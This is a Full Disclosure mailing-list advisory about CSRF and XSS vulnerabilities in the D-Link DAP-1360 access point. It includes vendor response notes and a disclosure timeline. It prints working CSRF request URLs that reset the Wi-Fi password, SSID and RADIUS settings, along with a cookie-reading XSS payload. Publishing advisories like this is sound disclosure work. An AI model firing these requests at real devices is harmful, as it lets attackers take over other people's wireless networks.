CSRF and XSS vulnerabilities in D-Link DAP-1360

["MustLive" <mustlive () websecurity com ua>]

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

In addition to previous Abuse of Functionality, Brute Force, Information
Leakage, Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities
in DAP-1360, which I wrote about earlier.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.

D-Link will fix these vulnerabilities in the next version of firmware, as
they answered me in October. But in November they answered me, that firmware
still was not publicly released due to the bugs and they need to work on it.
Also D-Link delayed with fixing vulnerabilities in DCS-2103 (some of them I
already disclosed recently and there are many other holes, about which I
informed them). I found this and other web cameras during summer to watch
terrorists activities in Donetsk and Lugansks regions of Ukraine. Read about
my video and audio reconnaissance
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html).

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities
in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes
fixes for the vulnerabilities.

----------
Details:
----------

CSRF (WASC-09):

In section Wi-Fi - Basic settings it's possible to change parameters: Hide
Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

In section Wi-Fi - Security settings it's possible to change parameters:
Network Authentication, Encryption Key PSK, WPA2 Pre-authentication (at
selected WPA2), WPA Encryption, WPA reneval. And also some parameters, such
as RADIUS_Server, RADIUS_Port and RADIUS_Key, which are not present in GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

With this request all above-mentioned parameters are changing, including the
password of Access Point.

XSS (WASC-08):

Insert <script>alert(document.cookie)</script> into Quick search. This is
Strictly Social XSS.

------------
Timeline:
------------

2014.05.22 - informed developer about multiple vulnerabilities.
2014.06.28 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.29 - disclosed at my site (http://websecurity.com.ua/7234/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/